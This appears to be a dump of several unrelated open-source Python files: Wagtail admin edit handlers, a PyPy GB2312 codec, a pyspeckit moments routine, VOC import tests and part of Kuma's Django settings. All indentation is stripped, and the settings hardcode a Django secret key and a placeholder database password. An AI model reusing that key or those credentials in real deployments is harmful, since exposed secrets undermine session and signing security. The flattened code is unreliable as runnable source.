template = "wagtailadmin/edit_handlers/object_list.html"
class FieldRowPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/field_row_panel.html"
def on_instance_bound(self):
super().on_instance_bound()
col_count = ' col%s' % (12 // len(self.children))
# If child panel doesn't have a col# class then append default based on
# number of columns
for child in self.children:
if not re.search(r'\bcol\d+\b', child.classname):
child.classname += col_count
class MultiFieldPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/multi_field_panel.html"
def classes(self):
classes = super().classes()
classes.append("multi-field")
return classes
class HelpPanel(EditHandler):
def __init__(self, content='', template='wagtailadmin/edit_handlers/help_panel.html',
heading='', classname=''):
super().__init__(heading=heading, classname=classname)
self.content = content
self.template = template
def clone_kwargs(self):
kwargs = super().clone_kwargs()
del kwargs['help_text']
kwargs.update(
content=self.content,
template=self.template,
)
return kwargs
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
class FieldPanel(EditHandler):
TEMPLATE_VAR = 'field_panel'
def __init__(self, field_name, *args, **kwargs):
widget = kwargs.pop('widget', None)
if widget is not None:
self.widget = widget
super().__init__(*args, **kwargs)
self.field_name = field_name
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs.update(
field_name=self.field_name,
widget=self.widget if hasattr(self, 'widget') else None,
)
return kwargs
def widget_overrides(self):
"""check if a specific widget has been defined for this field"""
if hasattr(self, 'widget'):
return {self.field_name: self.widget}
return {}
def classes(self):
classes = super().classes()
if self.bound_field.field.required:
classes.append("required")
if self.bound_field.errors:
classes.append("error")
classes.append(self.field_type())
return classes
def field_type(self):
return camelcase_to_underscore(self.bound_field.field.__class__.__name__)
def id_for_label(self):
return self.bound_field.id_for_label
object_template = "wagtailadmin/edit_handlers/single_field_panel.html"
def render_as_object(self):
return mark_safe(render_to_string(self.object_template, {
'self': self,
self.TEMPLATE_VAR: self,
'field': self.bound_field,
}))
field_template = "wagtailadmin/edit_handlers/field_panel_field.html"
def render_as_field(self):
return mark_safe(render_to_string(self.field_template, {
'field': self.bound_field,
'field_type': self.field_type(),
}))
def required_fields(self):
return [self.field_name]
def get_comparison_class(self):
# Hide fields with hidden widget
widget_override = self.widget_overrides().get(self.field_name, None)
if widget_override and widget_override.is_hidden:
return
try:
field = self.db_field
if field.choices:
return compare.ChoiceFieldComparison
if field.is_relation:
if isinstance(field, TaggableManager):
return compare.TagsFieldComparison
elif field.many_to_many:
return compare.M2MFieldComparison
return compare.ForeignObjectComparison
if isinstance(field, RichTextField):
return compare.RichTextFieldComparison
except FieldDoesNotExist:
pass
return compare.FieldComparison
def get_comparison(self):
comparator_class = self.get_comparison_class()
if comparator_class:
try:
return [functools.partial(comparator_class, self.db_field)]
except FieldDoesNotExist:
return []
return []
@cached_property
def db_field(self):
try:
model = self.model
except AttributeError:
raise ImproperlyConfigured("%r must be bound to a model before calling db_field" % self)
return model._meta.get_field(self.field_name)
def on_form_bound(self):
self.bound_field = self.form[self.field_name]
self.heading = self.bound_field.label
self.help_text = self.bound_field.help_text
def __repr__(self):
return "<%s '%s' with model=%s instance=%s request=%s form=%s>" % (
self.__class__.__name__, self.field_name,
self.model, self.instance, self.request, self.form.__class__.__name__)
class RichTextFieldPanel(FieldPanel):
def get_comparison_class(self):
return compare.RichTextFieldComparison
class BaseChooserPanel(FieldPanel):
"""
Abstract superclass for panels that provide a modal interface for choosing (or creating)
a database object such as an image, resulting in an ID that is used to populate
a hidden foreign key input.
Subclasses provide:
* field_template (only required if the default template of field_panel_field.html is not usable)
* object_type_name - something like 'image' which will be used as the var name
for the object instance in the field_template
"""
def get_chosen_item(self):
field = self.instance._meta.get_field(self.field_name)
related_model = field.remote_field.model
try:
return getattr(self.instance, self.field_name)
except related_model.DoesNotExist:
# if the ForeignKey is null=False, Django decides to raise
# a DoesNotExist exception here, rather than returning None
# like every other unpopulated field type. Yay consistency!
return
def render_as_field(self):
instance_obj = self.get_chosen_item()
context = {
'field': self.bound_field,
self.object_type_name: instance_obj,
'is_chosen': bool(instance_obj), # DEPRECATED - passed to templates for backwards compatibility only
}
return mark_safe(render_to_string(self.field_template, context))
class PageChooserPanel(BaseChooserPanel):
object_type_name = "page"
def __init__(self, field_name, page_type=None, can_choose_root=False):
super().__init__(field_name=field_name)
if page_type:
# Convert single string/model into list
if not isinstance(page_type, (list, tuple)):
page_type = [page_type]
else:
page_type = []
self.page_type = page_type
self.can_choose_root = can_choose_root
def clone_kwargs(self):
return {
'field_name': self.field_name,
'page_type': self.page_type,
'can_choose_root': self.can_choose_root,
}
def widget_overrides(self):
return {self.field_name: widgets.AdminPageChooser(
target_models=self.target_models(),
can_choose_root=self.can_choose_root)}
def target_models(self):
if self.page_type:
target_models = []
for page_type in self.page_type:
try:
target_models.append(resolve_model_string(page_type))
except LookupError:
raise ImproperlyConfigured(
"{0}.page_type must be of the form 'app_label.model_name', given {1!r}".format(
self.__class__.__name__, page_type
)
)
except ValueError:
raise ImproperlyConfigured(
"{0}.page_type refers to model {1!r} that has not been installed".format(
self.__class__.__name__, page_type
)
)
return target_models
return [self.db_field.remote_field.model]
class InlinePanel(EditHandler):
def __init__(self, relation_name, panels=None, heading='', label='',
min_num=None, max_num=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.relation_name = relation_name
self.panels = panels
self.heading = heading or label
self.label = label
self.min_num = min_num
self.max_num = max_num
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs.update(
relation_name=self.relation_name,
panels=self.panels,
label=self.label,
min_num=self.min_num,
max_num=self.max_num,
)
return kwargs
def get_panel_definitions(self):
# Look for a panels definition in the InlinePanel declaration
if self.panels is not None:
return self.panels
# Failing that, get it from the model
return extract_panel_definitions_from_model_class(
self.db_field.related_model,
exclude=[self.db_field.field.name]
)
def get_child_edit_handler(self):
panels = self.get_panel_definitions()
child_edit_handler = MultiFieldPanel(panels, heading=self.heading)
return child_edit_handler.bind_to(model=self.db_field.related_model)
def required_formsets(self):
child_edit_handler = self.get_child_edit_handler()
return {
self.relation_name: {
'fields': child_edit_handler.required_fields(),
'widgets': child_edit_handler.widget_overrides(),
'min_num': self.min_num,
'validate_min': self.min_num is not None,
'max_num': self.max_num,
'validate_max': self.max_num is not None
}
}
def html_declarations(self):
return self.get_child_edit_handler().html_declarations()
def get_comparison(self):
field_comparisons = []
for panel in self.get_panel_definitions():
field_comparisons.extend(
panel.bind_to(model=self.db_field.related_model)
.get_comparison())
return [functools.partial(compare.ChildRelationComparison, self.db_field, field_comparisons)]
def on_model_bound(self):
manager = getattr(self.model, self.relation_name)
self.db_field = manager.rel
def on_form_bound(self):
self.formset = self.form.formsets[self.relation_name]
self.children = []
for subform in self.formset.forms:
# override the DELETE field to have a hidden input
subform.fields[DELETION_FIELD_NAME].widget = forms.HiddenInput()
# ditto for the ORDER field, if present
if self.formset.can_order:
subform.fields[ORDERING_FIELD_NAME].widget = forms.HiddenInput()
child_edit_handler = self.get_child_edit_handler()
self.children.append(child_edit_handler.bind_to(
instance=subform.instance, request=self.request, form=subform))
# if this formset is valid, it may have been re-ordered; respect that
# in case the parent form errored and we need to re-render
if self.formset.can_order and self.formset.is_valid():
self.children.sort(
key=lambda child: child.form.cleaned_data[ORDERING_FIELD_NAME] or 1)
empty_form = self.formset.empty_form
empty_form.fields[DELETION_FIELD_NAME].widget = forms.HiddenInput()
if self.formset.can_order:
empty_form.fields[ORDERING_FIELD_NAME].widget = forms.HiddenInput()
self.empty_child = self.get_child_edit_handler()
self.empty_child = self.empty_child.bind_to(
instance=empty_form.instance, request=self.request, form=empty_form)
template = "wagtailadmin/edit_handlers/inline_panel.html"
def render(self):
formset = render_to_string(self.template, {
'self': self,
'can_order': self.formset.can_order,
})
js = self.render_js_init()
return widget_with_script(formset, js)
js_template = "wagtailadmin/edit_handlers/inline_panel.js"
def render_js_init(self):
return mark_safe(render_to_string(self.js_template, {
'self': self,
'can_order': self.formset.can_order,
}))
# This allows users to include the publishing panel in their own per-model override
# without having to write these fields out by hand, potentially losing 'classname'
# and therefore the associated styling of the publishing panel
class PublishingPanel(MultiFieldPanel):
def __init__(self, **kwargs):
updated_kwargs = {
'children': [
FieldRowPanel([
FieldPanel('go_live_at'),
FieldPanel('expire_at'),
], classname="label-above"),
],
'heading': ugettext_lazy('Scheduled publishing'),
'classname': 'publishing',
}
updated_kwargs.update(kwargs)
super().__init__(**updated_kwargs)
# Now that we've defined EditHandlers, we can set up wagtailcore.Page to have some.
Page.content_panels = [
FieldPanel('title', classname="full title"),
]
Page.promote_panels = [
MultiFieldPanel([
FieldPanel('slug'),
FieldPanel('seo_title'),
FieldPanel('show_in_menus'),
FieldPanel('search_description'),
], ugettext_lazy('Common page configuration')),
]
Page.settings_panels = [
PublishingPanel()
]
Page.base_form_class = WagtailAdminPageForm
@cached_classmethod
def get_edit_handler(cls):
"""
Get the EditHandler to use in the Wagtail admin when editing this page type.
"""
if hasattr(cls, 'edit_handler'):
edit_handler = cls.edit_handler
else:
# construct a TabbedInterface made up of content_panels, promote_panels
# and settings_panels, skipping any which are empty
tabs = []
if cls.content_panels:
tabs.append(ObjectList(cls.content_panels,
heading=ugettext_lazy('Content')))
if cls.promote_panels:
tabs.append(ObjectList(cls.promote_panels,
heading=ugettext_lazy('Promote')))
if cls.settings_panels:
tabs.append(ObjectList(cls.settings_panels,
heading=ugettext_lazy('Settings'),
classname='settings'))
edit_handler = TabbedInterface(tabs, base_form_class=cls.base_form_class)
return edit_handler.bind_to(model=cls)
Page.get_edit_handler = get_edit_handler
class StreamFieldPanel(FieldPanel):
def classes(self):
classes = super().classes()
classes.append("stream-field")
# In case of a validation error, BlockWidget will take care of outputting the error on the
# relevant sub-block, so we don't want the stream block as a whole to be wrapped in an 'error' class.
if 'error' in classes:
classes.remove("error")
return classes
def html_declarations(self):
return self.block_def.all_html_declarations()
def get_comparison_class(self):
return compare.StreamFieldComparison
def id_for_label(self):
# a StreamField may consist of many input fields, so it's not meaningful to
# attach the label to any specific one
return ""
def on_model_bound(self):
super().on_model_bound()
self.block_def = self.db_field.stream_block
|
bsd-3-clause
|
bussiere/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/gb2312.py
|
816
|
1027
|
#
# gb2312.py: Python Unicode Codec for GB2312
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('gb2312')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='gb2312',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
mit
|
low-sky/pyspeckit
|
pyspeckit/spectrum/moments.py
|
4
|
4902
|
from __future__ import print_function
import numpy as np
def moments(Xax, data, vheight=True, estimator=np.mean, negamp=None,
veryverbose=False, nsigcut=None, noise_estimate=None, **kwargs):
"""
Returns the gaussian parameters of a 1D distribution by calculating its
moments. Depending on the input parameters, will only output a subset of
the above.
Theory, from first principles (in the absence of noise):
integral(gaussian) = sqrt(2*pi*sigma^2) * amp
sigma = integral / amp / sqrt(2*pi)
In the presence of noise, this gets much more complicated.
The noisy approach is inspired by `mpfit
<http://cow.physics.wisc.edu/~craigm/idl/fitting.html>`_
Parameters
----------
Xax : np.ndarray
The x-axis for computing the 1st and 2nd moments
data : np.ndarray
The data from which to compute the various moments
estimator : function
A function to estimate the "height" or "background level" of the data,
e.g. mean or median. If masked arrays are being used, use the np.ma
versions of the numpy functions
negamp: bool or None
Force the peak negative (True), positive (False), or the sign of the
peak will be "autodetected" (negamp=None)
nsigcut: float or None
If specified, the code will attempt to estimate the noise and only use
data above/below `n`-sigma above the noise. The noise will be estimated
from the data unless the noise is specified with `noise_estimate`
noise_estimate: float or None
Guess for the noise value. Only matters if `nsigcut` is specified.
vheight : bool
Include an estimate of the background level?
Returns
-------
(height, amplitude, x, width_x)
height : float
is the background level
amplitude : float
is the maximum (or minimum) of the data after background subtraction
x : float
is the first moment
width_x : float
is the second moment
"""
Xax = np.array(Xax)
# this is completely absurd. How the hell do you test for masks?!
if (data.min() == data.max()):
return [0]*(3+vheight)
elif hasattr(data,'mask'):
# why do I have to do this? I shouldn't.
if data.mask.sum() > data.shape[0]-1:
return [0]*(3+vheight)
dx = np.abs(np.mean(np.diff(Xax))) # assume a regular grid
integral = (data*dx).sum()
height = estimator(data)
if noise_estimate is None:
noise_estimate = data.std()
height_cut_low = height-nsigcut*noise_estimate if nsigcut is not None else height
height_cut_high = height+nsigcut*noise_estimate if nsigcut is not None else height
# try to figure out whether pos or neg based on the minimum width of the pos/neg peaks
data_gt_low = data>height_cut_low
data_lt_low = data<height_cut_low
Lpeakintegral = integral - height_cut_low*(data_lt_low).sum()*dx - (data[data_gt_low]*dx).sum()
Lamplitude = data.min()-height
Lwidth_x = Lpeakintegral / Lamplitude / np.sqrt(2*np.pi)
data_gt_high = data>height_cut_high
data_lt_high = data<height_cut_high
Hpeakintegral = integral - height*(data_gt_high).sum()*dx - (data[data_lt_high]*dx).sum()
Hamplitude = data.max()-height
Hwidth_x = Hpeakintegral / Hamplitude / np.sqrt(2*np.pi)
# in order to guess properly, needs to be mean by default
# rev 824 broke this for test_hr2421
Lstddev = Xax[data<estimator(data)].std()
Hstddev = Xax[data>estimator(data)].std()
#print("Lstddev: %10.3g Hstddev: %10.3g" % (Lstddev,Hstddev))
#print("Lwidth_x: %10.3g Hwidth_x: %10.3g" % (Lwidth_x,Hwidth_x))
if negamp: # can force the guess to be negative
xcen,amplitude,width_x = Xax[np.argmin(data)],Lamplitude,Lwidth_x
elif negamp is None:
if Hstddev < Lstddev: # positive
xcen,amplitude,width_x, = Xax[np.argmax(data)],Hamplitude,Hwidth_x
else: # negative
xcen,amplitude,width_x, = Xax[np.argmin(data)],Lamplitude,Lwidth_x
else: # if negamp==False, make positive
xcen,amplitude,width_x = Xax[np.argmax(data)],Hamplitude,Hwidth_x
if veryverbose:
print("Hstddev: %g Lstddev: %g" % (Hstddev,Lstddev))
print(("negamp: %s amp,width,cen Lower: %g, %g Upper: %g, %g Center: %g" %
(negamp,Lamplitude,Lwidth_x,Hamplitude,Hwidth_x,xcen)))
mylist = [amplitude,xcen,width_x]
if negamp and amplitude > 0 and veryverbose:
print("WARNING: likely fit failure. negamp=True, but amplitude > 0")
if negamp is False and amplitude < 0 and veryverbose:
print("WARNING: likely fit failure. negamp=False, but amplitude < 0")
if np.isnan(width_x) or np.isnan(height) or np.isnan(amplitude):
raise ValueError("something is nan")
if vheight:
mylist = [height] + mylist
return mylist
|
mit
|
rubacalypse/voc
|
tests/structures/test_import.py
|
2
|
13038
|
import os
from ..utils import TranspileTestCase
class ImportTests(TranspileTestCase):
def test_import_java_module_static_method(self):
"You can invoke a static method from a native Java namespace"
self.assertJavaExecution(
"""
from java import lang
props = lang.System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_class_static_method(self):
"You can invoke a static method from a native Java class"
self.assertJavaExecution(
"""
from java.lang import System
props = System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_module(self):
"You can import a native Java namespace as a Python module"
self.assertJavaExecution(
"""
from java import lang
buf = lang.StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
def test_import_java_class(self):
"You can import a native Java class as a Python module"
self.assertJavaExecution(
"""
from java.lang import StringBuilder
buf = StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
def test_import_stdlib_module(self):
"You can import a Python module implemented in Java (a native stdlib shim)"
self.assertCodeExecution(
"""
import time
time.time()
print("Done.")
""")
def test_import_module(self):
"You can import a Python module implemented in Python"
self.assertCodeExecution(
"""
import example
example.some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_multiple_module_import(self):
"You can import a multiple Python modules implemented in Python"
self.assertCodeExecution(
"""
import example, other
example.some_method()
other.other_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
""",
'other':
"""
print("Now we're in the other module")
def other_method():
print("Now we're calling another module method")
"""
})
def test_full_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule
example.submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_module_from_dotted_path(self):
self.assertCodeExecution(
"""
from example import submodule
submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_symbol_from_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule import some_method
some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_full_deep_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule.subsubmodule.another
example.submodule.subsubmodule.another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_module_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule import another
another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule.another import another_method
another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method
some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_multiple_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method, other_method
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
})
def test_import_star(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
print("Call a third method...")
third_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("Now we're calling a third module method")
"""
}, run_in_function=False)
def test_import_star_with_all(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
__all__ = ['some_method', 'other_method']
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
}, run_in_function=False)
|
bsd-3-clause
|
MenZil/kuma
|
settings.py
|
2
|
35192
|
# Django settings for kuma project.
from collections import namedtuple
import json
import logging
import os
import platform
from django.utils.functional import lazy
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse_lazy
_Language = namedtuple(u'Language', u'english native iso639_1')
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ROOT = os.path.dirname(os.path.abspath(__file__))
path = lambda *a: os.path.join(ROOT, *a)
ROOT_PACKAGE = os.path.basename(ROOT)
ADMINS = (
('MDN devs', 'mdn-dev@mozilla.com'),
)
PROTOCOL = 'https://'
DOMAIN = 'developer.mozilla.org'
SITE_URL = PROTOCOL + DOMAIN
PRODUCTION_URL = SITE_URL
STAGING_URL = PROTOCOL + 'developer.allizom.org'
USE_X_FORWARDED_HOST = True
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'kuma', # Or path to database file if using sqlite3.
'USER': 'kuma', # Not used with sqlite3.
'PASSWORD': 'kuma', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
'OPTIONS': {
'sql_mode': 'TRADITIONAL',
'charset': 'utf8',
'init_command': 'SET '
'storage_engine=INNODB,'
'character_set_connection=utf8,'
'collation_connection=utf8_general_ci',
},
'ATOMIC_REQUESTS': True,
'TEST': {
'CHARSET': 'utf8',
'COLLATION': 'utf8_general_ci',
},
},
}
# Cache Settings
CACHE_PREFIX = 'kuma'
CACHE_COUNT_TIMEOUT = 60 # in seconds
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': CACHE_COUNT_TIMEOUT,
'KEY_PREFIX': CACHE_PREFIX,
},
'memcache': {
'BACKEND': 'memcached_hashring.backend.MemcachedHashRingCache',
'TIMEOUT': CACHE_COUNT_TIMEOUT * 60,
'KEY_PREFIX': CACHE_PREFIX,
'LOCATION': ['127.0.0.1:11211'],
},
}
CACHEBACK_CACHE_ALIAS = 'memcache'
# Addresses email comes from
DEFAULT_FROM_EMAIL = 'notifications@developer.mozilla.org'
SERVER_EMAIL = 'server-error@developer.mozilla.org'
PLATFORM_NAME = platform.node()
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'US/Pacific'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
# Accepted locales
MDN_LANGUAGES = (
'en-US',
'af',
'ar',
'az',
'bm',
'bn-BD',
'bn-IN',
'cs',
'ca',
'de',
'ee',
'el',
'es',
'fa',
'ff',
'fi',
'fr',
'fy-NL',
'ga-IE',
'ha',
'he',
'hi-IN',
'hr',
'hu',
'id',
'ig',
'it',
'ja',
'ka',
'ko',
'ln',
'ml',
'ms',
'my',
'nl',
'pl',
'pt-BR',
'pt-PT',
'ro',
'ru',
'son',
'sq',
'sw',
'ta',
'th',
'tl',
'tr',
'vi',
'wo',
'xh',
'yo',
'zh-CN',
'zh-TW',
'zu',
)
RTL_LANGUAGES = (
'ar',
'fa',
'fa-IR',
'he'
)
DEV_POOTLE_PRODUCT_DETAILS_MAP = {
'pt': 'pt-PT',
'fy': 'fy-NL',
'xx-testing': 'x-testing',
}
# Override generic locale handling with explicit mappings.
# Keys are the requested locale; values are the delivered locale.
LOCALE_ALIASES = {
# Treat "English (United States)" as the canonical "English".
'en': 'en-US',
# Create aliases for over-specific locales.
'bn': 'bn-BD',
'fy': 'fy-NL',
'ga': 'ga-IE',
'gu': 'gu-IN',
'hi': 'hi-IN',
'hy': 'hy-AM',
'pa': 'pa-IN',
'sv': 'sv-SE',
'ta': 'ta-LK',
# Map a prefix to one of its multiple specific locales.
'pt': 'pt-PT',
'sr': 'sr-Cyrl',
'zh': 'zh-CN',
# Create aliases for locales which do not share a prefix.
'nb-NO': 'no',
'nn-NO': 'no',
# Create aliases for locales which use region subtags to assume scripts.
'zh-Hans': 'zh-CN',
'zh-Hant': 'zh-TW',
}
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in MDN_LANGUAGES])
for requested_lang, delivered_lang in LOCALE_ALIASES.items():
if delivered_lang in MDN_LANGUAGES:
LANGUAGE_URL_MAP[requested_lang.lower()] = delivered_lang
def get_locales():
locales = {}
file = os.path.join(ROOT, 'kuma', 'languages.json')
json_locales = json.load(open(file, 'r'))
for locale, meta in json_locales.items():
locales[locale] = _Language(meta['English'],
meta['native'],
locale)
return locales
LOCALES = get_locales()
LANGUAGES = sorted(tuple([(i, LOCALES[i].native) for i in MDN_LANGUAGES]),
key=lambda lang: lang[0])
# List of MindTouch locales mapped to Kuma locales.
#
# Language in MindTouch pages are first determined from the locale in the page
# title, with a fallback to the language in the page record.
#
# So, first MindTouch locales were inventoried like so:
#
# mysql --skip-column-names -uroot wikidb -B \
# -e 'select page_title from pages where page_namespace=0' \
# > page-titles.txt
#
# grep '/' page-titles.txt | cut -d'/' -f1 | sort -f | uniq -ci | sort -rn
#
# Then, the database languages were inventoried like so:
#
# select page_language, count(page_id) as ct
# from pages group by page_language order by ct desc;
#
# Also worth noting, these are locales configured in the prod Control Panel:
#
# en,ar,ca,cs,de,el,es,fa,fi,fr,he,hr,hu,it,ja,
# ka,ko,nl,pl,pt,ro,ru,th,tr,uk,vi,zh-cn,zh-tw
#
# The Kuma side was picked from elements of the MDN_LANGUAGES list in
# settings.py, and a few were added to match MindTouch locales.
#
# Most of these end up being direct mappings, but it's instructive to go
# through the mapping exercise.
MT_TO_KUMA_LOCALE_MAP = {
"en": "en-US",
"ja": "ja",
"pl": "pl",
"fr": "fr",
"es": "es",
"": "en-US",
"cn": "zh-CN",
"zh_cn": "zh-CN",
"zh-cn": "zh-CN",
"zh_tw": "zh-TW",
"zh-tw": "zh-TW",
"ko": "ko",
"pt": "pt-PT",
"de": "de",
"it": "it",
"ca": "ca",
"cs": "cs",
"ru": "ru",
"nl": "nl",
"hu": "hu",
"he": "he",
"el": "el",
"fi": "fi",
"tr": "tr",
"vi": "vi",
"ro": "ro",
"ar": "ar",
"th": "th",
"fa": "fa",
"ka": "ka",
}
TEXT_DOMAIN = 'messages'
SITE_ID = 1
PROD_DETAILS_DIR = path('../product_details_json')
MDC_PAGES_DIR = path('../mdc_pages')
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
USE_L10N = True
LOCALE_PATHS = (
path('locale'),
)
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = path('media')
# Absolute path to the directory for the humans.txt file.
HUMANSTXT_ROOT = MEDIA_ROOT
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATIC_ROOT = path('static')
SERVE_MEDIA = False
# Paths that don't require a locale prefix.
LANGUAGE_URL_IGNORED_PATHS = (
'media',
'admin',
'robots.txt',
'contribute.json',
'services',
'static',
'1',
'files',
'@api',
'__debug__',
'.well-known',
'users/persona/',
'users/github/login/callback/',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '#%tc(zja8j01!r#h_y)=hy!^k)9az74k+-ib&ij&+**s3-e^_z'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'jingo.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
JINGO_EXCLUDE_APPS = (
'admin',
'waffle',
'registration',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.contrib.messages.context_processors.messages',
'allauth.account.context_processors.account',
'allauth.socialaccount.context_processors.socialaccount',
'kuma.core.context_processors.global_settings',
'kuma.core.context_processors.i18n',
'kuma.core.context_processors.next_url',
'jingo_minify.helpers.build_ids',
'constance.context_processors.config',
)
MIDDLEWARE_CLASSES = (
# LocaleURLMiddleware must be before any middleware that uses
# kuma.core.urlresolvers.reverse() to add locale prefixes to URLs:
'kuma.core.middleware.LocaleURLMiddleware',
'kuma.core.middleware.SetRemoteAddrFromForwardedFor',
'kuma.wiki.middleware.DocumentZoneMiddleware',
'kuma.wiki.middleware.ReadOnlyMiddleware',
'kuma.core.middleware.Forbidden403Middleware',
'django.middleware.common.CommonMiddleware',
'kuma.core.middleware.RemoveSlashMiddleware',
'commonware.middleware.NoVarySessionMiddleware',
